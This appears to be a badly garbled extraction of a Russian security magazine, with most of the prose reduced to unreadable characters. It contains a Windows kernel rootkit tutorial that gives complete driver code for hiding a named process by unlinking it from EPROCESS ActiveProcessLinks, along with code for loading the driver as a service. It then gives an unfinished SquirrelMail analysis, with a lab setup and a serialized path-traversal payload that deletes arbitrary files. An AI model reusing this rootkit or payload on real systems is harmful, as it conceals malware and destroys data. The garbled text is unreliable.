????,� ??� ????�???�?� ?� ???�??????????�???� ????�???� ???�?� ?????� ????�?
??� ??????� ????�???,� ??� ??� ??� ????�???� ???�???�??.� ???� ???,� ???????� ????�
????�??�?????????�???�???�???��??�??????�??�???�?�?�???.
#define NT_DEV_NAME L"\\Device\\drv_dkom"
#define DOS_DEV_NAME L"\\DosDevices\\drv_dkom"
NTSTATUS status = STATUS_SUCCESS;
PDEVICE_OBJECT pDvcObj = NULL;
UNICODE_STRING usDrvName, usDosDvcName;
RtlInitUnicodeString(&usDrvName, NT_DEV_NAME);
RtlInitUnicodeString(&usDosDvcName, DOS_DEV_NAME);
status = IoCreateDevice (pDriverObject, 0,
                        &usDrvName,
                        FILE_DEVICE_UNKNOWN,
                        FILE_DEVICE_SECURE_OPEN,
                        FALSE, &pDvcObj);
if (!NT_SUCCESS(status)) {
   return status;
}
status = IoCreateSymbolicLink(&usDosDvcName, &usDrvName);
if (!NT_SUCCESS(status)) {
   IoDeleteDevice(pDvcObj);
   return status;
}
????,� ??� ???�???�???� ????????� ?????�?????� ???�???� ????�???� ??????
????,� ???�???,� ???� ????�??� ????�???� ?� ???????� usermode� ?� ???� ???�?????
???�????�???�???�????�??�????�?.�?????�??????�??�???�??�?????
????.
???????�????????�??????燚KOM�(DIRECT燢ERNEL燨BJECT
MANIPULATION)
???�???� ???�?� ???�?????� ???????�??� ???�??� ?� ????�????� ??????� ????
??�???�???�??�??�????�??�?????�???.�??�??�?�??????�???�??燢MDF
???� ????�??� ???�??�??� ???????� ???�??� ??????�????� ???�???�?� ????
(DKOM).�??�???�?�?�????�???�???�???�??�??�??�??????�??��???�
???�??� ???�??�?� ?� ?????�???� ????� ???� ???�???�?� EPROCESS,� ???� ???� ?????�
???�?��??.
INFO
?????�???� EPROCESS,� ????� ???�??�?.� ?� ???
?????�????� ???�?� ???????�??� ?� ???�??�?,� ????�
????�?� ??� ???�???�?� ?????�??� ???�??,� ???�????
PEB,� ?????�???� KPROCESS,� ?????�???� KTHREAD
?� ETHREAD.� ???� ?????�???� ?????�???�?� ????????�
????�??� ???�????� ??,� ???????�?� ?� ???�?????
????????� ????�????�??� (kernelmode),� ???� ?� ???
???�??�??� ?????�???,� ???�?� PEB.� ???� ???�??�?
???�?�??�????�???.
???�?� ???�???� EPROCESS� ?????�??????�?,� ???�????�?� ???�??�???�?� ?????�
???� ???????�??� WinDbg� ?� ????� ??� ?� ????�?� ?????�?� dt� _EPROCESS.� ???�?
???�?�?�??�???�?????�??�?�??�?�(???�????�???�???�?��??�??�??�???
????燱indows):
lkd> dt _EPROCESS
nt!_EPROCESS
+0x000 Pcb              : _KPROCESS
+0x2d8 ProcessLock      : _EX_PUSH_LOCK
+0x2e0 RundownProtect   : _EX_RUNDOWN_REF
+0x2e8 UniqueProcessId  : Ptr64 Void
+0x2f0 ActiveProcessLinks : _LIST_ENTRY
+0x300 Flags2           : Uint4B
+0x300燡obNotReallyActive�燩os��it
+0x300燗ccountingFolded�燩os��it
+0x300燦ewProcessReported�燩os��it
+0x300燛xitProcessReported�燩os��it
+0x300燫eportCommitChanges�燩os��it
+0x300燣astReportMemory�燩os��it
+0x300燜orceWakeCharge牋:燩os��it
+0x300燙rossSessionCreate�燩os��it
+0x300燦eedsHandleRundown�燩os��it
+0x300燫efTraceEnabled牋:燩os��it
+0x300燚isableDynamicCode�燩os�,�it
+0x300燛mptyJobEvaluated�燩os�,�it
...
??�???�???,� ???� ??� ???� ?????�???,� ???� ???�???�?� ????�?.� ????????� ???????�
????�??�????�????�???�?????�?�?????�????�???燛PROCESS.��??�??
????�???�?�??�???�?�????.� ActiveProcessLinks��??�?????�?�????�???
_LIST_ENTRY,�??????,��???�??�???,�??�???�?�?�??�??�?�??�?�?????
(FLink)��????�(BLink).�??�?�???�????�??,�??�??�????燺LIST_ENTRY:
typedef struct _LIST_ENTRY {
   struct _LIST_ENTRY *FLink;
   struct _LIST_ENTRY *BLink;
} LIST_ENTRY, *PLIST_ENTRY;
???�???,�???�??�??��??�????�?�?????�???�?:
lkd> dt _LIST_ENTRY
nt!_LIST_ENTRY
+0x000 Flink            : Ptr64 _LIST_ENTRY
+0x008 Blink            : Ptr64 _LIST_ENTRY
???�?�??�???????�?,�???�?????��??�???�??�???�?�??�?�???�?,�???�
??�??�???�??�?????�??.��???�??�??,�??�??�???�?????� BLink�� FLink
?????� ????�??,� ???�?� ???� �??�??�???粻 ???�??� ???�???.� ???� ???�?� ????�
?????�??�??�??�???��???�???�?�?�??�??�??燩ID�,�???�??�??�??,
???????�??�???�?????�????燘Link�燜Link.燩ID�?�??�?�????�???????
??� ?????�???� EPROCESS,� ???�??� ????� ??????�???� UniqueProcessID.
???� ??????�??� ???�?� EPROCESS� ???�???�???�?� ???�??�?� PsGetCurrent?
Process,�??????�??�??�??�?????�?�???.
//�??????�?????�???????,�????????�??燱indows�爔64
#define UniqueProcessId 0x2e8
#define ActiveProcessLinks 0x2f0
#define ImageFileName 0x450
#define IRP_HIDE_PROC 0x801
#define NT_DEV_NAME L"\\Device\\drv_dkom"
#define DOS_DEV_NAME L"\\DosDevices\\drv_dkom"
NTSTATUS DriverEntry (PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING pRegPath)
{
牋�//�???????�?????????�???????��???????�????????????�?????
   NTSTATUS status = STATUS_SUCCESS;
   PDEVICE_OBJECT pDvcObj = NULL;
   UNICODE_STRING usDrvName, usDosDvcName;
   RtlInitUnicodeString(&usDrvName, NT_DEV_NAME);
   RtlInitUnicodeString(&usDosDvcName, DOS_DEV_NAME);
   status = IoCreateDevice(pDriverObject, 0,
                           &usDrvName,
                           FILE_DEVICE_UNKNOWN,
                           FILE_DEVICE_SECURE_OPEN,
                           FALSE, &pDvcObj);
   if (!NT_SUCCESS(status)) {
       return status;
   }
   status = IoCreateSymbolicLink(&usDosDvcName, &usDrvName);
   if (!NT_SUCCESS(status)) {
       IoDeleteDevice(pDvcObj);
       return status;
   }
牋�//�???????營RP�?�???????????????,�???�???????�??????�
???????��??????�???????�???????
牋�//�???????�??�???營RP�??????�?�???????????????
   int x;
   for (x = 0; x < IRP_MJ_MAXIMUM_FUNCTION; ++x)
       pDriverObject->MajorFunction[x] = MyCallbackFunk;
牋爌DriverObject?>MajorFunction[IRP_MJ_DEVICE_CONTROL]�燤yCont
rolHide;牋//�????????�????�??????燤yCallbackControl�?�?????�
IRP_MJ_DEVICE_CONTROL
   pDriverObject->DriverUnload = DrvUnload;
   return status;
}
VOID燚rvUnload(PDRIVER_OBJECT牋pDriverObject)爗
牋�//�???????:�??????�????????????�?????��?????????
牋營oDeleteSymbolicLink(&usDosDvcName);
牋營oDeleteDevice(pDriverObject?>DeviceObject);
}
NTSTATUS MyCallbackFunk(PDEVICE_OBJECT pDeviceObject, PIRP pIrp)
{
   pIrp->IoStatus.Status = STATUS_SUCCESS;
   IoCompleteRequest(pIrp, IO_NO_INCREMENT);
   return pIrp->IoStatus.Status;
}
NTSTATUS燤yControlHide(PDEVICE_OBJECT爌devObj,燩IRP爌Irp)
{
牋�//�???????�????????�?�???營RP�?????
牋燩IO_STACK_LOCATION爌IrpSt�營oGetCurrentIrpStackLocation(pIrp);
牋�//�???????�?????�?????�????
牋燯LONG營nBufLen�爌IrpSt?>Parameters.DeviceIoControl.InputB
ufferLength;
牋�//�???????�?????�?????�?????
牋燯LONG燨utBufLen�爌IrpSt?>Parameters.DeviceIoControl.Output
BufferLength;
牋�//�???????�??�??????????�????????
牋燯LONG燙trlCode�爌IrpSt?>Parameters.DeviceIoControl.IoControlCode
;
牋燦TSTATUS爏tatus�燬TATUS_SUCCESS;
牋爏witch(CtrlCode){
牋燾ase營RP_HIDE_PROC:
牋牋牋營nBufLen�爌Irp?>AssociatedIrp.SystemBuffer;
牋牋牋爌Irp?>IoStatus.Information�爏trlen(InBufLen);
牋牋牋爃ide_proc(InBufLen);
牋燽reak;
牋燿efault:
牋牋牋爏tatus�燬TATUS_INVALID_DEVICE_REQUEST;
牋燽reak;
牋爙
牋爎eturn爏tatus;
}
VOID爃ide_proc(char�*pc)
{
牋�//�???????????�???燜Link�燘Link
牋燩EPROCESS燾urrentProc��(PEPROCESS)PsGetCurrentProcess();
牋燩EPROCESS爏tartProc��(PEPROCESS)PsGetCurrentProcess();
牋燩LIST_ENTRY燼ctiveProcLinks;
牋燩UCHAR爌ImageFileName;
牋燩UINT32爌PidProc;
牋爁or�(;�((DWORD64)startProc�!=�(DWORD64)currentProc);)
牋爗
牋牋牋爌ImageFileName��(PUCHAR)((DWORD64)currentProc�+營mageF
ileName);
牋牋牋爌PidProc��(PUINT32)((DWORD64)currentProc�+燯niqueProcessId);
牋牋牋燼ctiveProcLinks��(PLIST_ENTRY)((DWORD64)currentProc�+燗ctive
ProcessLinks);
牋牋牋爏tartProc��(PEPROCESS)((DWORD64)activeProcLinks?>Flink��
ActiveProcessLinks);
牋牋牋爄f�(!strcmp((const燾har*)pImageFileName,燭EXT(pc)))爗
牋牋牋牋牋�*((PDWORD64)activeProcLinks?>Blink)��(DWORD64)active
ProcLinks?>Flink;
牋牋牋牋牋�*((PDWORD64)(activeProcLinks?>Flink)�+���(DWORD64)
activeProcLinks?>Blink;
牋牋牋牋牋燼ctiveProcLinks?>Blink��(PLIST_ENTRY)&activeProcLinks?>
Flink;
牋牋牋牋牋燼ctiveProcLinks?>Flink��(PLIST_ENTRY)&activeProcLinks?>
Flink;
牋牋牋爙
牋爙
}
??�??� ????�??�??� ???�???�??� ?� ???�???� hide_proc,� ???�??� ?� ??� ???�?:� ??
????�??� ????�?????� ???�??� ?� ??????�???�?� ????� FLink� ?� BLink.� ?� ???�?
?????�?�??????�??�???�????�????.�?????�????�??��?�????�??�???
???�???� ?� ???�????� ???????�???� ????�????� ???� ??????� ????�???.� ???
???�??�??�?????�???�??��?????�???�??�????�?.
???�?????�???�????
???�?????�???�??��???�??�?�??�???�???�??�???�?,�????�??????�??
??� ???� ?� ???� ???�????� ???� ??????� SCM� (Service� Control� Manager)� ?� ???
??????� NTAPI????�???� NtLoadDriver.� ??� ???????� ???�??� ????�??,
???� ???????�????�??� Microsoft� ?� ???????�???� ???� ??� ???�??� ????????
??????�????:�???????�?????�?�??�??�???�???�?燬ervice燙ontrol燤anag?
er.�?�??�?????�??????�??�??�??�???�??:
BOOL爏etPrivileges(LPCTSTR爏zPrivName)
{
牋燭OKEN_PRIVILEGES爐p�爗�;
牋燞ANDLE爃Token��
牋爐p.PrivilegeCount��
牋爐p.Privileges[0].Attributes�燬E_PRIVILEGE_ENABLED;
牋爄f�(!OpenProcessToken(GetCurrentProcess(),燭OKEN_ADJUST_PR
IVILEGES,�&hToken))
牋牋牋爏td::cout�<�"OpenProcessToken爁ailed\n";
牋爄f�(!LookupPrivilegeValue(NULL,爏zPrivName,�&tp.Privileges[0].
Luid))
牋牋牋爏td::cout�<�"LookupPrivilegeValue爁ailed\n";
牋爄f�(!AdjustTokenPrivileges(hToken,燜ALSE,�&tp,爏izeof(tp),燦ULL,�
NULL))
牋爗
牋牋牋爏td::cout�<�"AdjustTokenPrivileges爁ailed\n";
牋牋牋燙loseHandle(hToken);
牋牋牋爎eturn燭RUE;
牋爙
牋爎eturn燜ALSE;
}
??�??�??�???:
setPrivileges("SeLoadDriverPrivilege");
???�?� ???�?� ?????�??�???� ????�??� ?� ???�???� (???�??�?� ??� ??????????
???????�???�????�???�??�??�??�??�???�???�?�???):
//�???��?????�???????
#define燚RV�"c:\\\\Windows\\System32\\drivers\\dkomdrv.sys"
//�??�??????
#define燬RV�"dkomdrv"
//�??�?????????
#define燚VC�"\\\\.\\dkomdrv"
//�??,�????????�???????�?????�??????
#define營RP_HIDE_PROC�801
SC_HANDLE爃SCMgr,hSrv;
HANDLE爃Dvc;
//�????????燬CM
hSCMgr�燨penSCManager(NULL,燦ULL,燬C_MANAGER_ALL_ACCESS);
//�??????�?????
hSrv�燙reateService(
牋爃SCManager,
牋燭EXT(SRV),
牋燭EXT(SRV),
牋燬C_MANAGER_ALL_ACCESS,
牋燬ERVICE_KERNEL_DRIVER,
牋燬ERVICE_DEMAND_START,
牋燬ERVICE_ERROR_IGNORE,
牋燭EXT(DRV),
牋燦ULL,燦ULL,燦ULL,燦ULL,燦ULL
);
//�????????�?????
StartService(hSrv,�燦ULL);
????,�???�??�???�??�??��??????.�?????�????�??�??:�?�??�??�???�
????� ????�???� ???????�???� ???,� ???????� ???�????� ???� ??????� ???�??� ???
???�???�(??�???�???�??????�??爌id):
hDvc�燙reateFile(
牋燭EXT(DEVICE),
牋燝ENERIC_READ爘燝ENERIC_WRITE,
牋�
牋燦ULL,
牋燨PEN_EXISTING,
牋燜ILE_ATTRIBUTE_NORMAL,
牋燦ULL
);
BOOLEAN爐otal�燚eviceIoControl(
牋爃Device,
牋營RP_HIDE_PROC,牋//�??�??????????�??
牋爌id,
牋爏trlen(pid)�+�
牋爎etbuf,
牋�0,
牋�&bytes_returned,
牋�(LPOVERLAPPED)燦ULL
);
???�?�??�?�??�?�??�???�??�????�??�??�??,�???�??�?�???????�???�
???�?� ????????�?� ???????� ???�???,� ??� ?� ?????� ???� ???� ??????,� ???�?� ??
?????�??�??�??�?????�???�????�??�????�??�??�????��??????�??�????�
?????,� ??� ?????�????� ??� ??� ???.� ???�?� ?????�????� ???�?� ????� ???�??� ????�
????� ????????� ??� ???�????�?� ?????� ?� ??� ????�???�??� ???�???�??,� ???????
??????�?��??�??�???.
?????
??�???�???�???��??????�?�?????�??,�??????�??�?�????��???�????
??????� ????,� ?� ???�???� ????�???�??� ????�??,� ????�?????� ???�??�?
???????燚KOM.�?????�???,�??�???�?�????�?????�???��??�????�????�
?????,�?��????�?????�???�???�??�????�????��?�???�???�????�?
?????� ???�?.� ??� ???�?� ??????� ????�???�??� ?????�????�?,� ???�?� ???�??.
???�?????,�?????�???�???�???�?�??�???�?,�??�??�?�???????�?!
?????
aLLy
ONsec
@iamsecurity
??????�??????????????
?????�?????????
?�????????燬QUIRRELMAIL
???
?????????
?????
?� ???�????� ???�???� SquirrelMail� ???�???� ???�??�??� ????�
???????,�,�???�??�?????�?�????,�?????�?�???�???�?
???�???�??:� ?????� ????�???????� ?????� ??????� ???� ???�???
???�?????�??�??�?��??�???.�?�????�??�??�?�??�???�
????�??燬quirrelMail,�??�??�??�??��????�?�????�?�???�
?????�?,� ?� ???�????�???� ???� ??� ?� ??� ?????�???.� ?????� ????�
??????,�???�?�??�????�?��??�?�??�??�??�?????.
???�?� ???� ?????� ?� ??�??� ?� ???�??� ???�????�?� SquirrelMail� ?� ???�?� ????� ???
??� RCE,� ?� ????�???� ????� ?� ?????�??�???� ????�??�??� ???????�??,� ???????
??????�???�?� ?????�???� sendmail.� ?????� ?????� ???�?� ???�?,
?� ???� 2017� ????,� ?????�???�???� ??� TROOPERS18� ???�???� ???�??� (Florian
Grunow)� ????�????� ???� ????� ???�????�??� ???�??????� ?� ????� ??� ???�??�?.
??� ???� ???� ????�???� ???�?????� ?� ???�???� ????�????�??� ???�??� ?� ?????�
?????,� ?� ????????� ???�??�??�??� ???�???�?� ???�????�?� ??????� ???�?
??�??????�??�???.
???�??� ?????� ???� ??� ???�??????� ???????�??� ?� ???�??�??� ???�????�?,
???�??,�???�?�??�???.�???�?�??�????�???�?�??�??�??�?�?�??�????�
????� ???� ????�???.� ???�????� ?� ?????�???�???� ???�?????,� ?� ??� ??�????
???????�??��??�?????�??�??.
???�??????????�?????????
???�???????�?� ???�????� ?????.� ???�????� ???�???� ?� ???� ?????� ???� ????�
????�??,�??�????�????�??????�???�???�??�??????�+3��??????�????�
???�??�???�??.� ???� ???�?� ???�?????� ???�??,� ?� ???� ???�??????� ?� ???�???
??� ????�???.� ??????� ????� ???�??� ???�??� Docker� ?????� ????????.� ????
??� ??????� ??????�?� ?� ???�???�??,� ??� ?????� ???????� ???�??�??� ??� ??�??
??????�????��?????�?��??�????�?�???�?.
??�??�???�????��???�??�???�?�???�??????�????�??�????.
docker run -ti -p80:80 --rm --name=squirrel --hostname=squirrel debian /bin/bash
apt-get update && apt-get install -y sendmail wget nano apache2 dovecot-core dovecot-imapd php
???�???�?� ????� ??� ???�?????� ???�??�???�??� SquirrelMail.� ????�?� ???�?
?????� ????� ?????�???�???�??,� ???� ???� ???�????�???� ???�???�?� ???????�?
????�?,�??�??�??�???�??�??�???�?.
install -d /usr/local/src/downloads
cd /usr/local/src/downloads
wget http://prdownloads.sourceforge.net/squirrelmail/squirrelmail-webmail-1.4.22.tar.gz
mkdir /usr/local/squirrelmail
cd /usr/local/squirrelmail
mkdir data temp attach
chown www-data:www-data data temp attach
tar xvzf /usr/local/src/downloads/squirrelmail-webmail-1.4.22.tar.gz
mv squirrelmail-webmail-1.4.22 www
??�???� ???�?� ???�???� ???�?????�???�??� ????� ???� Squirrel.� ???� ????� ?????
?????�??�?�??�?????�??.
www/configure
???� ??� ???�??�?� ??????� ????�??� ????�??�???????� ?????�???� ???�??????�
????�??�???爓ww/config/config_default.php.
???� ???� ????�??,� ???� ?� ???� ???�?� ???�???,� ?� ???� ????,� ??� ???????� ?????
???�???????�?� ???�??�??� ???�?,� ?� ???� ???�?� ????�????�???� ?� ????�??.
??�???�????�???�????:
1. Data Directory: /var/local/squirrelmail/data/.
2. Attachment Directory: /var/local/squirrelmail/attach/.
??�???�?��???�???�???��????�??�?????�???�????.
sed "s/domain = 'example.com'/domain = 'visualhack'/; s#/var/local/squirrelmail/#/usr/local/squirrelmail/#g" /usr/local/squirrelmail/www/config/config_default.php > /usr/local/squirrelmail/www/config/config.php
????�???�???� ?� ?????�??� ???�??� ?� ???�???�?� ???�????� ???�????.� ????�
????�?,�????�??�???�?�????�?????�?????.
echo "protocols = imap" > /etc/dovecot/dovecot.conf
???�???�?�???�???�??�?�??�?�??????.
echo \!include auth-passwdfile.conf.ext > /etc/dovecot/conf.d/10-auth.conf
??�???� ???????� ???�?� ?� dovecot,� ???� ???� ???� ????????� ???�??�??�??� ????�
?????�?�??�?�???�???�???�??�??��??�???.
useradd -G mail attacker
install -d -g attacker -o attacker /home/attacker
cat /etc/passwd|grep attacker|sed 's/x/{PLAIN}passw/; s/.$//' > /etc/dovecot/users
??�?????�?�??�?????��??�???燗pache�??�?�??�??�???��??�??�???�?
SquirrelMail��??�??�?�??�??�??�?,��??????�?�??????�?.
cat >>/etc/apache2/apache2.conf <<EOL
Alias /squirrelmail /usr/local/squirrelmail/www
<Directory /usr/local/squirrelmail>
  Options Indexes FollowSymLinks
  AllowOverride None
  Require all granted
</Directory>
EOL
???� ???�?� ??� ?� ???� ???�????�????.� ??????� ?????�???� ???�?????� ???�???
?�?????�??�????�???�???�?��??�????�??�????�?.
service dovecot start && service apache2 start && service sendmail start
???�?�???�???�??燬quirrelMail
??????????? ??????
?
? �?????�?????
?????
??? ????????? ?????
??????�??????????????
?????�?????????��????????
SQUIRRELMAIL
??????
????�???�??�???��??�???�??�????�?????�???�?,�??�??��??�?��???�
???.�???�???�???��????�?�?????燾ompose.php.
????�???�??�????�?????�???�?�燬quirrelMail
???�???�??� SquirrelMail� ??????�?� ??� PHP,� ?????�?� ???????� ????�??� ?� ????�
????�??????�??�?�??�???�?.�?�????�???�??�?�???�???�????� show?
InputForm.
/src/compose.php
647:     if ($compose_new_win == '1') {
648:         compose_Header($color, $mailbox);
649:     } else {
650:         displayPageHeader($color, $mailbox);
651:     }
...
695:     showInputForm($session, $values);
???�???�??�??�??�??�???�?�?�????�??�?�??�???�????�??�??�??.
?????�????�??�?�???�????,�??�???�??�?????????��??�??�?�???�???�
????�??�???.
???�??�?�???�????�??�??�?��???�?
???� ???????� ????�?� Attach� ???�??� POST????�??� ??� ???� ???� ??� ??????� com?
pose.php.� ?� ???�?� ??????�???� ????????� attach,� ?� ????�???�???� ????�
??????�????�???:
/src/compose.php
92: sqgetGlobalVar('attach',$attach, SQ_POST);
...
582: } elseif (isset($attach)) {
...
588:     if (saveAttachedFiles($session)) {
589:         plain_error_message(_("Could not move/copy file. File not attached"), $color);
590:     }
591:     if ($compose_new_win == '1') {
592:         compose_Header($color, $mailbox);
593:     } else {
594:         displayPageHeader($color, $mailbox);
595:     }
596:     showInputForm($session);
597: }
???� ??????,� ?� ????�?� 588� ??????�???� ???�???� saveAttachedFiles,� ???
?????�???�???�??�?�??�?��??�??????�??�?�??�??�??�????�????.�??
?????�????� ????�???� ???�???�??� $attachment_dir� ?� ???�?????�???�??
???�?燬quirrel燾onfig.php.
/src/compose.php
1562: function saveAttachedFiles($session) {
1563:     global $_FILES, $attachment_dir, $username,
1564:         $data_dir, $composeMessage;
...
1567:     if (! is_uploaded_file($_FILES['attachfile']['tmp_name']) ) {
1568:         return true;
1569:     }
1570:
1571:     $hashed_attachment_dir = getHashedDir($username, $attachment_dir);
???�????�
???�?�
??????�???�?�
???????�??�
???�??�?
GenerateRandomString,� ???????� ???�???� ????�?� ?????�??� ???�?� ??� ????�
??????�??�????????�????�??�????.
/src/compose.php
1572:     $localfilename = GenerateRandomString(32, '', 7);
1573:     $full_localfilename = "$hashed_attachment_dir/$localfilename";
1574:     while (file_exists($full_localfilename)) {
1575:         $localfilename = GenerateRandomString(32, '', 7);
1576:         $full_localfilename = "$hashed_attachment_dir/$localfilename";
1577:     }
/functions/strings.php
614: function GenerateRandomString($size, $chars, $flags = 0) {
615:     if ($flags & 1) {
616:         $chars .= 'abcdefghijklmnopqrstuvwxyz';
617:     }
618:     if ($flags & 2) {
619:         $chars .= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
620:     }
621:     if ($flags & 4) {
622:         $chars .= '0123456789';
623:     }
...
629:     sq_mt_randomize(); /* Initialize the random number generator */
630:
631:     $String = '';
632:     $j = strlen( $chars ) - 1;
633:     while (strlen($String) < $size) {
634:         $String .= $chars{mt_rand(0, $j)};
635:     }
636:
637:     return $String;
638: }
??�??� ???�??�??� ????,� ???????� ???� ???�??� ?????�??�???�??� PHP,� ?????�
???�???�???�?��???�???�???��????�????�??�??�????�???�??.
/src/compose.php
1581:     if (!@rename($_FILES['attachfile']['tmp_name'], $full_localfilename)) {
1582:         if (!@move_uploaded_file($_FILES['attachfile']['tmp_name'],$full_localfilename)) {
1583:             return true;
1584:         }
1585:     }
???�?????�??�??�??�???�??�???�????�??��???�?
?� ?????�????� ??????�???� ?????� initAttachment� ????�?� Message.� ??
??????�?�??�??�?,�??�???�???�????�?��???�?,��????�??�???爀nti?
ties?�??�??�?�??�?�??�???�??�?�????�??�?�???�?燤essage.
/src/compose.php
1586:     $type = strtolower($_FILES['attachfile']['type']);
1587:     $name = $_FILES['attachfile']['name'];
1588:     $composeMessage->initAttachment($type, $name, $localfilename);
1589: }
/class/mime/Message.class.php
1091:     function initAttachment($type, $name, $location) {
1092:         $attachment = new Message();
1093:         $mime_header = new MessageHeader();
1094:         $mime_header->setParameter('name', $name);
1095:         $pos = strpos($type, '/');
1096:         if ($pos > 0) {
1097:             $mime_header->type0 = substr($type, 0, $pos);
1098:             $mime_header->type1 = substr($type, $pos+1);
1099:         } else {
1100:             $mime_header->type0 = $type;
1101:         }
1102:         $attachment->att_local_name = $location;
1103:         $disposition = new Disposition('attachment');
1104:         $disposition->properties['filename'] = $name;
1105:         $mime_header->disposition = $disposition;
1106:         $attachment->mime_header = $mime_header;
1107:         $this->entities[]=$attachment;
1108:     }
??�???�???� ???�????� ???�?????�?� ????�?� 1102,� ???� ???�??� ????� ??� ???�?
????�?� ?� ???�??� ???�???�???� ?� ????�???� att_local_name.� ???�?� ????� ???
????�???�???,� $composeMessage?>entities� ?????�??� ???� ????�?????�??
?�???�?�??�?.
???�?�??�?�????�????�????�?????�???�??�???爏howInputForm.�????�
??� ??????� ?� ???� ???�???� ????�?????�??� ???�?,� ?� ?� ????� ????�???� ????�
??????�???�??�???:
/src/compose.php
1136: function showInputForm ($session, $values=false) {
...
1366:     // composeMessage can be empty when coming from a restored session
1367:     if (is_object($composeMessage) && $composeMessage->entities)
1368:         $attach_array = $composeMessage->entities;
...
1463:     echo addHidden('composesession', $composesession).
1464:         addHidden('querystring', $queryString).
1465:         (!empty($attach_array) ?
1466:         addHidden('attachments', serialize($attach_array)) : '').
1467:         "</form>\n";
??�???� ??????� ????�?� ???�????�??� ???�??,� ?� ???�?� ?????�???�?� ????�??
????� attachments,� ???????� ?????�??� ???� ???????�??� ????� ???�??� ?� ????
??????�??�????�??� ?� URL???????�??�??� ???????�??� $composeMessage?>
entities.
??�????�????�??�??�??��???�?????�???��??�?�??????�???
???�??�?�??�?�???�??�???�?�??????�???,�?�??�????�??????�???�???�
???� ?� ?� ????�?????� ??????�???�?� ???� ??????� ?� ???�???�???� ????�???�?
(??????�???,�???�???????�?�???�?�????�??�???爑nserialize).
/src/compose.php
115: sqgetGlobalVar('attachments', $attachments, SQ_POST);
...
371: if (!empty($attachments)) {
372:     $attachments = unserialize($attachments);
373:     if (!empty($attachments) && is_array($attachments))
374:         $composeMessage->entities = $attachments;
375: }
????????�???????????�?????
??�??�???�??�??�??�???�??�??�???�?????�???�??�?�???�??�??.�???�
???� ?� ???�?????�?� ???�????� ???� ????�?????�??� ????�??.� ????�???� ????
?� ????� Delete� Selected� Attachments,� ????�???????�?� ????�??� ?????�??� ????�
?????.
???�??�?�??�????�???�?????�???�??�?
??�?????�???�??�?????�???�??�???,�???�?????�?�??�????:
/src/compose.php
113: sqgetGlobalVar('do_delete', $do_delete, SQ_POST);
...
613: } elseif (isset($do_delete)) {
...
625:     if (isset($delete) && is_array($delete)) {
626:         foreach($delete as $index) {
627:             if (!empty($composeMessage->entities) && isset($composeMessage->entities[$index])) {
628:                 $composeMessage->entities[$index]->purgeAttachments();
631:                 unset ($composeMessage->entities[$index]);
632:             }
?�??�?????�???�????� purgeAttachments,�??????�??�???�??�?��??�?
???�?????燩HP????�???爑nlink.
/class/mime/Message.class.php
1114:     function purgeAttachments() {
1115:         if ($this->att_local_name) {
1116:             global $username, $attachment_dir;
1117:             $hashed_attachment_dir = getHashedDir($username, $attachment_dir);
1118:             if ( file_exists($hashed_attachment_dir . '/' . $this->att_local_name) ) {
1119:                 unlink($hashed_attachment_dir . '/' . $this->att_local_name);
1120:             }
1121:         }
?� ???� ?� ????�???� att_local_name,� ??� ???????� ???�?� ????�???� ???�????.
???� ???� ???�????�?� ???�?.� ???� ???????� ???�????� ?� ???�???� unlink.
??� ?????�?� ???�????�????� ???� ????� ???�????,� ???????� ????� ????�???�??�?
???�???�???�?�?�??�?�??�????�???�?.��??�???�?�?????,�???�?�??
???�??� ?� ???�????�??� ???�??� ?????�?� ??� ???�?,� ?� ????�?� ?� ??� ????�???�
?????�???�???� attachments.�??�???�???,�??�??�?�??�?�??�??�???�???
???�????� ???�????�?� ???�?,� ????�?� ?????� ???� ?� ???�???.� ?� ????� ???�??
???�??�????�??.
...s:14:"att_local_name";s:32:"76Nh2n1ufiHXcSlNYvKe6SbBfpcQC1hG";}}
??�??,� ??� ???� ???????�?,� ???� ???� ???�?� ???�??�???.� ??????� ????�??�???
path� traversal:� ???� ??????� ../� ???�?� ???�?� ??� ?????�????� ?� ????�???,� ????�
??????�?�?�??�?��??�???�?????????�?�??�??�?????�??�??????�?????
?????�?.� ????� ??� ??� ??????� ??� ???�???,� ???� ?????�?� ???�??� ????�??�?????�
???� ???�??� ?� PHP,� ??� ???�?????� ???????�??� ??????� ???�?� ??� ????�????
???????�?�??��?�?�?????��???�????�??�????�燩HP.
???�????�?�??�??�??�????�???� owned��????�????� /tmp,�??�??�???�
????� ???�?� ????�?� ???�?,� ???�????�??� ??� ??????� ????� ????�?????�??
???� ???�?????� ???�??,� ??� ??????�?� ??????�?� ???????�??� (?� ????� ???�??
???� www?data).� ??????� ????�???� ????�???� att_local_name� ?� ??????�???
???�??.
...s:14:"att_local_name";s:24:"../../../../../tmp/owned";}}
????,�????�?�?,�??�??�?.
??�?????�??�????�??�?????�???�??�?�????�??�??????
??????�???????????�?????
???�???�??�??�???�??�??,�??�??�?�??�?????��??�???�?????�?�????�
?????燿eliverMessage.
/src/compose.php
1638: function deliverMessage(&$composeMessage, $draft=false) {
1639:     global $send_to, $send_to_cc, $send_to_bcc, $mailprio, $subject, $body,
1640:         $username, $popuser, $usernamedata, $identity, $idents, $data_dir,
1641:         $request_mdn, $request_dr, $default_charset, $color, $useSendmail,
1642:         $domain, $action, $default_move_to_sent, $move_to_sent;
1643:     global $imapServerAddress, $imapPort, $imap_stream_options, $sent_folder, $key;
...
1705:     /* multipart messages */
1706:     if (count($composeMessage->entities)) {
??� ???�?� ?????�????� ???�???�???� ???????� ????�??.� ?????� ??????�???� ????�
?????� ????�????.� ?� ??????�??�?� ??� ????�??�?????� ???�??�?� ?� ???�???
?????�????�???�????�????�??�???�?�??�??�??�?,�?��??�?�??�???�
???��????�????�?????爉ail�?�???�?燚eliver.
/src/compose.php
1826:     if ($stream) {
1827:         $deliver->mail($composeMessage, $stream, $reply_id, $reply_ent_id);
1828:         $succes = $deliver->finalizeStream($stream);
1829:     }
/class/deliver/Deliver.class.php
075:     function mail(&$message, $stream=false, $reply_id=0, $reply_ent_id=0,
076:                   $imap_stream=NULL, $extra=NULL) {
...
138:         $this->send_mail($message, $header, $boundary, $stream, $raw_length, $extra);
??�??�?�????�???�????爏end_mail.
/class/deliver/Deliver.class.php
167:     function send_mail($message, $header, $boundary, $stream=false,
168:                        &$raw_length, $extra=NULL) {
169:
170:         if ($stream) {
171:             $this->preWriteToStream($header);
172:             $this->writeToStream($stream, $header);
173:         }
174:         $this->writeBody($message, $stream, $raw_length, $boundary);
175:     }
??�??�????� ??????�??� ?� ??????� writeBody,� ???????� ??????�???� ????� ????�
